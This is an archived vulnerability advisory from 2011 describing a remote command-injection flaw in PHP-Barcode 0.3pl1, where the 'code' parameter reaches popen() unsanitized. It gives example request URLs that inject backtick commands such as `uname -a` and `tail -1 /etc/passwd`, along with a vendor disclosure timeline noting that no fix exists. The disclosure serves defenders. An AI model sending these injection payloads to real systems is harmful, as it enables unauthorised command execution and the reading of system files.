PHP-Barcode 0.3pl1 Code Execution

PHP-Barcode 0.3pl1 Code Execution: Posted Jul 26, 2011; Authored by beford; PHP-Barcode version 0.3pl1 suffers from a remote code execution vulnerability.; tags | exploit, remote, php, code execution; SHA-256 | 1a0fb1da8f684f5fa63bce7737f4422ada3ed7efc234622bba13720c22f02bf6; Download | Favorite | View

PHP-Barcode 0.3pl1 Code Execution

PHP-Barcode 0.3pl1 Remote Code Execution
 
The input passed to the code parameter is not sanitized and is used on
a popen() function. This allows remote command execution and also
allows to see environment vars:
 
Windows
 
http://www.site.com/php-barcode/barcode.php?code=%TMP%
 
Linux
 
http://www.site.com/php-barcode/barcode.php?code=012$PATH$d
http://www.site.com/php-barcode/barcode.php?code=`uname%20-a`
http://www.site.com/php-barcode/barcode.php?code=`tail%20-1%20/etc/passwd`
 
Vendor:
  http://www.ashberg.de/php-barcode/download/
 
Vendor informed:
  July  6 / 2011
 
Vendor acknowledgement:
  July 7 / 2011
 
Fix not available from vendor.
 
- beford

Top Authors In Last 30 Days

Red Hat 270 files
indoushka 152 files
Jay Turla 150 files
Ubuntu 68 files
h00die 54 files
juan vazquez 43 files
sinn3r 41 files
H D Moore 31 files
Debian 27 files
Karn Ganeshen 23 files

File Archives

Systems

AIX (429)
Apple (2,104)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,117)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,567)
HPUX (880)
iOS (387)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,066)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,731)
Slackware (941)
Solaris (1,614)
SUSE (1,444)
Ubuntu (9,807)
UNIX (9,449)
UnixWare (187)
Windows (6,762)
Other

PHP-Barcode 0.3pl1 Code Execution

PHP-Barcode 0.3pl1 Code Execution

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

PHP-Barcode 0.3pl1 Code Execution

Share This

PHP-Barcode 0.3pl1 Code Execution

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems